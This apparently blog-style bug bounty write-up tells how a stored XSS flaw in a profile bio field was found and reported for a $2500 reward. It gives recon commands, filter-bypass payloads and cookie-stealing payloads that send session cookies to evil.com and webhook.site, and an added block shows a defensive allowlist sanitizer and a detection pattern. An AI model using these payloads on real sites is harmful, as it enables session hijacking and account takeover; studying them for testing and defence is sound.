I Hacked a Million-Dollar Website with Just a Text Box — Earned $2500! (Full Story)

TheIndianNetwork


How I Turned a Simple Text Input into a Massive Stored XSS Exploit

Bug bounty hunting is all about patience, creativity, and a deep understanding of security flaws. This is the full breakdown of how I went from basic information gathering to exploiting a critical stored XSS vulnerability in a high-profile web application, leading to a $2500 bug bounty reward. If you want to learn the exact process I used, buckle up!

Step 1: Information Gathering & Reconnaissance

Before jumping into testing, I spent hours mapping out the target application. Here’s what I did:

1. Subdomain Enumeration

  • Used tools like amass, Subfinder, and Assetfinder to collect all available subdomains.
  • Discovered an internal admin portal that wasn’t indexed publicly.
  • Tools used:
  • amass enum -passive -d target.com
  • subfinder -d target.com
  • assetfinder --subs-only target.com

2. Directory & Parameter Fuzzing

  • Used dirsearch to find hidden directories:
  • dirsearch -u https://admin.target.com -e php,html,js
  • Found a /profile/settings page where users could update their personal information.
  • The page had a text input field for bio updates.
  • Tested various encoding techniques and bypass methods using Burp Suite.

Step 2: Finding the Stored XSS Vulnerability

After testing the input field with various payloads, I noticed something interesting:

1. Initial Payload Testing

I started by entering a simple XSS payload:

<script>alert('XSS')</script>
  • At first, nothing happened. The input field sanitized basic <script> tags.
  • However, I noticed that the website allowed rich text formatting (like bold, italic, and links).

2. Bypassing Filters with SVG & Event Handlers

Since direct <script> tags were blocked, I tried an SVG-based XSS payload:

<svg onload=alert('XSS')></svg>

Result: Success! The alert box popped up immediately upon page reload.

3. JavaScript Event Handler Bypass

I then tested an alternative approach using an onmouseover event:

<a href="#" onmouseover="alert('XSS')">Hover me</a>
  • This worked when users hovered over the malicious link.
  • A useful variant when the payload should fire on user interaction rather than on page load.
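The filter gap behind Steps 2.1 to 2.3, shown from the defender's side as an added example that is not code from the original post or the target application: a denylist that only strips <script> passes the SVG and event-handler payloads above untouched, while an allowlist of plain formatting tags with attributes dropped (the tag set b, i, em, strong, p, br, a is an assumption for a bio field) neutralises all of them.

```javascript
// Added example (not the post's code): denylist vs allowlist sanitization of rich-text bios.

// Naive filter of the kind the post describes: strips <script> blocks and nothing else.
// Every payload from Step 2 (svg/onload, a/onmouseover, img/onerror) passes straight through.
function naiveSanitize(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
}

// Assumed allowlist for a bio field: formatting tags only, no attributes except a
// vetted http(s) href on <a>. Anything else (svg, img, iframe, on* handlers) is dropped.
const ALLOWED_TAGS = new Set(["b", "i", "em", "strong", "p", "br", "a"]);

function allowlistSanitize(html) {
  // Match either a complete tag (name + raw attribute text) or a stray < / > in text.
  const token = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>|[<>]/g;
  return html.replace(token, (m, name, attrs) => {
    if (!name) return m === "<" ? "&lt;" : "&gt;"; // bare angle bracket in text
    const tag = name.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) return "";           // unknown tag: remove it entirely
    if (m.startsWith("</")) return `</${tag}>`;
    if (tag !== "a") return `<${tag}>`;              // attributes never survive
    // Re-emit <a> with href only when it is an absolute http(s) URL.
    const h = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    const url = h ? (h[1] ?? h[2] ?? h[3]) : "";
    if (!/^https?:\/\//i.test(url)) return "<a>";
    return `<a href="${url.replace(/"/g, "&quot;")}" rel="noopener noreferrer">`;
  });
}

// Detection aid for request logs or a WAF rule: any inline on* handler inside a tag.
// Heuristic only (e.g. "online=" inside a URL also matches); use it to flag, not to block.
function hasInlineEventHandler(html) {
  return /<[^>]*\bon[a-z]+\s*=/i.test(html);
}

// Compare both filters against the post's payloads (constructed inputs).
const SAMPLES = [
  "<svg onload=alert('XSS')></svg>",
  "<a href=\"#\" onmouseover=\"alert('XSS')\">Hover me</a>",
  "<img src=x onerror=\"fetch('https://evil.com/steal?cookie='+document.cookie)\">",
];
for (const s of SAMPLES) {
  console.log({ naive: naiveSanitize(s), allowlist: allowlistSanitize(s), flagged: hasInlineEventHandler(s) });
}
```

The allowlist function is a teaching sketch; a production application should run rich text through a maintained sanitizer such as DOMPurify rather than a hand-written filter.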

Step 3: Escalating the Attack

A basic alert box wasn’t enough. I wanted account takeover, so I crafted a payload that stole cookies and sent them to my server:

1. Creating a Malicious JavaScript Payload

<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
  • This payload sent session cookies of any logged-in user to my controlled server.
  • This meant I could hijack admin accounts once they visited my profile page.

2. Exfiltrating Data with a Webhook

Instead of storing stolen cookies manually, I automated it using Webhook.site:

<script>
fetch('https://webhook.site/your-webhook-url?c='+document.cookie);
</script>
  • This captured cookies in real-time and displayed them on my webhook dashboard.

Step 4: Reporting & Getting Paid

Once I confirmed the exploit worked, I immediately reported it responsibly through the company’s bug bounty program.

1. Writing a Professional Bug Report

  • Summary: Stored XSS in the profile bio section.
  • Impact: Allows full session hijacking, leading to account takeover.
  • Steps to Reproduce:
  1. Log in to admin.target.com.
  2. Go to Profile Settings → Bio field.
  3. Enter the following payload: <svg onload=alert('XSS')></svg>
  4. Save changes and refresh the profile page.
  5. Observe the XSS execution.

2. The Reward

Within 48 hours, the company confirmed the vulnerability and awarded me a $2500 bug bounty!

Conclusion: How You Can Replicate My Success

If you want to earn big rewards like this, here’s what you should do:

1. Master Recon Techniques

  • Use tools like amass, Subfinder, Burp Suite, and dirsearch.

2. Understand XSS Bypass Techniques

  • Try payloads using SVG, onerror, iframe, JavaScript event handlers, and alternative encoding.

3. Test Input Fields in Depth

  • Profile sections, comment boxes, search bars — all are potential XSS targets.

4. Automate Your Testing

  • Use Burp Suite Intruder for automated fuzzing.
  • Leverage custom scripts for testing payloads at scale.

5. Learn to Write High-Quality Reports

  • Clear steps + impact analysis = higher bounties!

Final Thoughts

Finding this stored XSS and earning $2500 wasn’t luck — it was the result of proper recon, creative exploitation, and responsible disclosure. If you put in the effort, you can do this too!

🚀 Start hunting today — your next big payout is waiting!

📧 Contact me: theindiannetwork@protonmail.com
🌐 My Blog: theindiannetwork.medium.com
📺 My YouTube Channel: youtube.com/@theindiannetwork
